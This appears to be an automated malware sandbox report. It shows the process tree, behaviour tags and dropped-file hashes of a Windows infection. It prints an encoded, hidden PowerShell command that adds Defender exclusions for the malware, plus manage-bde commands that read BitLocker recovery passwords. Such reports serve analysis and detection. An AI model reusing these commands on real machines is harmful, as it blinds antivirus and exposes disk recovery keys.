                                                                                                                                                                                                                          powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAGQALQBtAFAAUAByAGUAZgBlAFIARQBOAEMAZQAgAC0ARQBYAEMATABVAHMASQBvAG4AcABBAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0AZgBvAHIAYwBFADsAIABBAGQARAAtAG0AUABQAFIARQBmAEUAcgBlAE4AYwBFACAALQBlAFgAQwBMAFUAUwBpAE8AbgBwAFIATwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACAALQBmAE8AUgBjAEUA
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                          PID:5528
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                          PID:3168
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:3664
                                                                                                                                                                                                                        • C:\Program Files\Mesh Agent\MeshAgent.exe
                                                                                                                                                                                                                          "C:\Program Files\Mesh Agent\MeshAgent.exe"
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                          PID:5028
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -noprofile -nologo -command -
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:4912
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -noprofile -nologo -command -
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:1744
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -noprofile -nologo -command -
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:4020
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -noprofile -nologo -command -
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:920
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            /c manage-bde -protectors -get C: -Type recoverypassword
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:6096
                                                                                                                                                                                                                              • C:\Windows\system32\manage-bde.exe
                                                                                                                                                                                                                                manage-bde -protectors -get C: -Type recoverypassword
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:5200
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                /c manage-bde -protectors -get F: -Type recoverypassword
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:5164
                                                                                                                                                                                                                                  • C:\Windows\system32\manage-bde.exe
                                                                                                                                                                                                                                    manage-bde -protectors -get F: -Type recoverypassword
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4416
                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:5516
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                    PID:4016
                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2396
                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:4216
                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:5956
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:4900
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:6976
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:6336
                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:6556
                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\1Em4pQdp\ZaoGrJHNl4a2KMlU.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:6844
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1Em4pQdp\ZaoGrJHNl4a2KMlU.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1Em4pQdp\ZaoGrJHNl4a2KMlU.exe
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:16120
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\kKINm3Ob\mNo60N55KlpgCR1m.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\kKINm3Ob\mNo60N55KlpgCR1m.exe 16120
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:16160
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 16160 -s 668
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                              PID:14848
                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:15772
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 16160 -ip 16160
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:8088
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2936 -ip 2936
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:18844
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4596 -ip 4596
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:24892
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 24932 -ip 24932
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:31216
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 19060 -ip 19060
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:37560
                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:37212

                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                    • C:\Program Files\Mesh Agent\MeshAgent.db

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      154KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      aea965bbdb5b046eed49db8c9948fc09

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      d98e317c8cd22236c017cdd8c61a99c839b3daaf

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      a880eb0d6e8f9341e3c0e94150df98cbb659a9249503a7714a22fee31da4d73e

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      4dbf2c68caa973bbfc55c6a690dcb2e5ee6cd37cb19f811f8589c40446c9ec5a1f2dcf979b5df4564d2a4e674ce9636f82ae15c28348b0a7ae0291034c8f0abb

                                                                                                                                                                                                                                                                    • C:\Program Files\Mesh Agent\MeshAgent.db.tmp

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      154KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      7efd46676e5fcc0520943c95ea8b5b7e

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      307571fc90b36cad490cc103cf7aabf0c36d86c8

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      9f7df6626904a4f698bfc39db8b97c88faf1518865f4d191391dae2bc237aa34

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      8c6fe0b42ec24c43302a33f4aab03c7e040d59e560d49ba536c9dc9faab8c7b5f2496d5876267c9ef51a7735d344ff20e324ca526e127e0d269a03bf16148cde

                                                                                                                                                                                                                                                                    • C:\Program Files\Mesh Agent\MeshAgent.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      91424f307b7f0e238aab1f06434a7dc4

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      4fb5ec3082d3545a79e2ccbd4b624320cafd68f1

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      cdc2aa09167bd32f9a01eb60414d0b8faaf8616b9a23a7fc1671bb6bc7f162a1

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      6830052ce91c378e7e21c385fb9a522f57fa59d1082a460a26199dbcfa808b37abad741eb8bf7dfd746d522d37dc03ac9d1674fb429f988873eb6a53fde93f83

                                                                                                                                                                                                                                                                    • C:\ProgramData\cjwbaas0hv.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      251KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      58d3a0d574e37dc90b40603f0658abd2

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      bf5419ce7000113002b8112ace2a9ac35d0dc557

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a

                                                                                                                                                                                                                                                                    • C:\ProgramData\djmo8g4ect.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      97c49181dbb0062cf2a18a636cccb319

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      f720a61758c7923c72f82341398539cdbf6052bb

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      0e88262fc03a25cd71e0592fd5fdb6bb70ac10f81c25312cdb53e0d2da64ad5e

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      5e5846586bf9934d8af254a41638dbddb2be10d48fbb2362bc1dc18f6d7009624a061f06ae5ec624ac147db8e60a9f8f0f0887f5597811abb3825b875e107956

                                                                                                                                                                                                                                                                    • C:\ProgramData\tpEu9oB7EnF7

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      96KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      6066c07e98c96795ecd876aa92fe10f8

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      f73cbd7b307c53aaae38677d6513b1baa729ac9f

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      33a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      7d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7

                                                                                                                                                                                                                                                                    • C:\ProgramData\vaieu\8q9zuasrq

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      dfd4f60adc85fc874327517efed62ff7

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      f97489afb75bfd5ee52892f37383fbc85aa14a69

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      c007da2e5fd780008f28336940b427c3bfd509c72a40bfb7759592149ff3606e

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      d76f75b1b5b23aa4f87c53ce44c3d3b7e41a44401e53d89f05a114600ea3dcd8beda9ca1977b489ac6ea5586cf26e47396e92d4796c370e89fab0aa76f38f3c4

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      40B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      13e85db7ab7bd0131b6d7b372eb6b3cb

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      5bd031c1d79faee9f5b180576fb2ba73afd236a9

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      96bf5616e02db2a7d71c4eb64ee4bf0ca8a06700e34ffa47bdc9c02f97092e20

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      63e735544156689c62d6d5cffe428e6cf749066239e69dae910f08b89aa9f87efbeaf9ba5fa16d2644d16478ee854903270d4e330ddf89ea1bae6d54c98cb029

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      2B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      79KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      c6476d0394254b492c23758d169d93ce

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      2deaaa0915f340b55e05df38f074c8bd92954ed8

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      49b6b6cde6e688464625d806f09670afabf0fc3f74b99adc34752e52d5f99841

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      c5edcecd352d102608da165390430c063342911afe50de8da10d15460c64246beae3c49242810e9e75c679d25aaccff2c1d8515781f242c99c658b884cf78c2b

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      25604a2821749d30ca35877a7669dff9

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      49c624275363c7b6768452db6868f8100aa967be

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      280B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      998db8a9f40f71e2f3d9e19aac4db4a9

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      dade0e68faef54a59d68ae8cb3b8314b6947b6d7

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      1b28744565eb600485d9800703f2fb635ecf4187036c12d47f86bbd1e078e06b

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      0e66fd26a11507f78fb1b173fd50555dbd95b0d330e095cdd93206757c6af2780ece914a11a23cd4c840636a59470f44c6db35fa392303fb583806264e652016

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      280B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      c8dc8aa73c227a7a43c2f4f9bee2436a

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      f77de33d188e3c327944acd50688224e3ec5ca2b

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      ca3190293a092f4ddd8924dff1a0c813a1623ec6929cc6b4854c27ce25944c35

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      3a7f8e45a66dc381cd080d42b5306377f3f2d3435c1cdf31685638719f0620306b0b576f70aac805b41643af48a4e46c31ac9722b2813383ee652c56b155cebc

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      280B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      27f1aa298ae32d929668c96e159f07af

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      4c6e100cfc9dd08090fad9c5a2c2c18097f41ae6

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      7a075d4d67f1caf2d6cc770008e5f2e8161ec93601b77d38550ab7fdaccfe537

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      eddb4e1e55a5f2debb7c22e7a6b537612d90d7cb688d708a23727d8eadb97fe8777a494af418734f3a0f2458eb93b53b45a47e62f7f1be0ad54ee0b30616ec14

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      280B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      804b08ce68849518252c9f897e68385d

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      078820c058c54f6ef097927fc219f6b79d5b4ad1

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      923539cac325f75b5284c36d91258d9815279dc3e2df95ac1c1d5c5ee71e2807

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      435b3193c4db24e060f0505396fc9d4e1c05474976888775e083f3658982da9e8fca79717f9a199dcfabeb50fc5604dd0d73bfc99cf5762da2b5343bf530f73f

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      16B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      46295cac801e5d4857d09837238a6394

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\MANIFEST-000001

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      23B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      3fd11ff447c1ee23538dc4d9724427a3

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      1335e6f71cc4e3cf7025233523b4760f8893e9c9

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      16KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      09b88f538fbb6c5b1c18a12d6e072e68

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      5a7122464c8037370c1813deb725e5c6ea7d376d

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      951743abeb80ddff8ff5c07eca35bca616ea5d15b5116335a6040c65d7179cfe

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      ae739309cd003c79231d9dabf02cf40674044936eafeeb4e403e63abe9451aa6646b5565e4117a4de20b39f9eecf87b517a80e3ab76e3ec6759b8b6d6e86cf61

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      cb746a2314fcc3168c080989b5b79bcb

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      aa139629041174b72a5c401186c1bd8c53d7f4c6

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      5572e6eb98e2e5e28641fd06a0823de9be53989b02d121fa4adf7550f7da2a89

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      c217309e473a11454159ce968ad8cb0ed92f40009065f72bc54a34eeeffc5ea3cf96d49e3dcc1893e669cb2c2fd77d0be73ca324a6dfdbb3a68d9412d4f84d01

